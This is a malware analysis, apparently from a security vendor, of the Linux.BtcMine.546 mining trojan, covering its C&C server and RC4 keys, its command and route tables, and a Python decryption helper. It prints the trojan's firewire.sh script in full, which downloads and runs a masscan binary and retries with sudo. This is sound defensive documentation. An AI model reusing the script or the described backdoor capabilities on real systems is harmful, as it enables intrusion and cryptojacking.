sha1
- e545ceffc8948e3ca9900212807cf3a862d33581
Description
Linux.BtcMine.546 is a trojan backdoor program capable of infecting Linux devices and launching a cryptocurrency miner. This trojan has advanced remote control capabilities. It is implemented as an ELF64 executable file written in Go.
Operating routine
When launched, the trojan checks whether it has been run on the computer before. If it finds a running process, as indicated by the presence of a .lock file, the instance of the trojan that is running is terminated. The trojan then obtains its settings using the envconfig library, which allows it to initialize its configuration based on the environment variables. In particular, envconfig writes the IP address of the C&C server and the flag for enabling the miner into the Specification structure:
type Specification struct {
	Backend   string // IP address of the C&C server, string encoded with RC4
	Debug     bool
	DisableMi bool   // miner activation flag
}
If the IP address of the C&C server is not specified in the configuration, the trojan uses the default address hxxp://185.154.53[.]140. System information, including the operating system name, architecture type, trojan version, number of processor cores, memory size, and other parameters, is sent to the control server. Once this happens, the trojan is ready to receive commands. Note that all traffic between the trojan and the control server is encrypted with the RC4 stream cipher. The following two sequences are used as keys: 2abd6e2c1akl762939453125 and 764153446b61.
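Because the C&C traffic is plain RC4 with the two keys quoted above, an analyst can decode a captured message with a few lines of code. The following Python snippet is an added example, not code from this description or from the trojan itself: the check-in body it encrypts is constructed for illustration, and trying both keys and keeping the one that yields printable output is an assumption, since the description does not say which key is used in which direction.

```python
from typing import Optional, Tuple

# Keys quoted in the description; it does not say which key applies to
# which direction, so both are tried (assumption: one of them is enough).
KEYS = [b"2abd6e2c1akl762939453125", b"764153446b61"]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR; encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def looks_like_text(data: bytes) -> bool:
    """Heuristic: the right key yields printable ASCII, a wrong one yields noise."""
    return len(data) > 0 and all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def try_decrypt(blob: bytes) -> Optional[Tuple[bytes, str]]:
    """Return (key, plaintext) for the first key that yields printable output."""
    for key in KEYS:
        plain = rc4(key, blob)
        if looks_like_text(plain):
            return key, plain.decode("ascii")
    return None


# Constructed stand-in for a check-in body (fields mirror the description:
# OS name, architecture, cores, memory); this is not captured traffic.
SAMPLE_PLAINTEXT = '{"os":"linux","arch":"amd64","cores":4,"mem":8192}'
SAMPLE_BLOB = rc4(KEYS[0], SAMPLE_PLAINTEXT.encode("ascii"))

if __name__ == "__main__":
    print(try_decrypt(SAMPLE_BLOB))
```

On real captures, feed the raw HTTP body of a request to one of the routes listed below into try_decrypt; a result of None means neither key produced readable text.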
List of supported commands
Name | Description |
---|---|
scan | Initiates a port scan |
update | Downloads a new version of the trojan and restarts it |
exec | Runs the command using /bin/sh -c |
exec_output | Runs the command using /bin/sh -c; the result is sent to the C&C server |
masscan | Creates a firewire.sh script, runs it, then deletes the script |
socks | Creates a proxy (SOCKS5) |
backconnect | Creates a reverse shell |
request | Sends HTTP requests |
tcp | Redirects the payload to the target computer |
download_and_exec | Downloads a file and runs it; the result is sent to the C&C server and the downloaded file is deleted from the system |
redisBrute | Starts brute-forcing Redis authentication |
krongo | Changes the IP address of the active C&C server |
stat | Sends information to the C&C server about how much memory the miner is using |
mkill | Shuts down the miner |
List of routes used
Name | Description | Method |
---|---|---|
/o | Sends results to the server | POST |
/mg | Obtains the PID of the current miner | GET |
/ms | Sends the miner PID | POST |
/getT | Receives additional command information (arguments) | POST |
/get | Obtains a task | GET |
/s | Sends SOCKS5 connection data | POST |
/r | Sends the result of the executed command | POST |
/l | Sends log files | POST |
/h | Sends keep-alive packets | GET |
The firewire.sh script created and executed by the trojan checks the OS distribution information in the /etc/os-release file, determines the type of package manager, looks for the installed libpcap-devel package (a library for low-level network monitoring) and installs it if it is missing. It then verifies the MD5 checksum of the firewire binary (masscan), downloads it from the URL passed as the fifth argument if the checksum does not match or md5sum is unavailable, and runs the scan, retrying with sudo if the first attempt fails.
#!/bin/sh
PORT=$1      # port(s) to scan
RATE=$2      # packet rate
INPUT=$3     # file with target list
OUTPUT=$4    # output file for scan results
MASSCAN=$5   # URL from which the firewire (masscan) binary is fetched
# Detect the distribution family and make sure libpcap is installed
cat /etc/os-release | grep -vw grep | grep "rhel" >/dev/null
if [ $? -eq 0 ]
then
    rpm -qa | grep libpcap-dev > /dev/null
    if [[ $? -eq 0 ]]; then
        echo "Package is installed rhel!"
    else
        echo "Package is NOT installed rhel!"
        yum -y update
        yum -y install libpcap-devel
    fi
else
    if [ $(dpkg-query -W -f='${Status}' libpcap-dev 2>/dev/null | grep -c "ok installed") -eq 0 ];
    then
        echo "Package is NOT installed deb!"
        apt-get update
        apt-get install -y libpcap-dev
    else
        echo "Package is installed deb!"
    fi
fi
# Verify the firewire binary by MD5; download it on mismatch or if md5sum is absent
if [ -x "$(command -v md5sum)" ]; then
    sum=$(md5sum firewire | awk '{ print $1 }')
    echo $sum
    case $sum in
        45a7ef83238f5244738bb5e7e3dd6299)
            echo "firewire OK"
            ;;
        *)
            echo "firewire wrong"
            (curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)
            ;;
    esac
else
    echo "No md5sum"
    (curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)
fi
chmod +x firewire
# Run the scan; if it fails, retry with sudo
./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2>/dev/null
if [ $? -eq 0 ]
then
    echo "success"
else
    echo "fail"
    sudo ./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2>/dev/null
    if [ $? -eq 0 ]
    then
        echo "success2"
    else
        echo "fail2"
    fi
fi
The trojan uses gopsutil, a Go port of the psutil library, to obtain information about running processes: https://github.com/shirou/gopsutil/tree/master.
HTTP requests are processed using the Resty library: https://github.com/go-resty/resty.
Interaction with SOCKS5 proxies is enabled using the go-socks5 package: https://github.com/armon/go-socks5.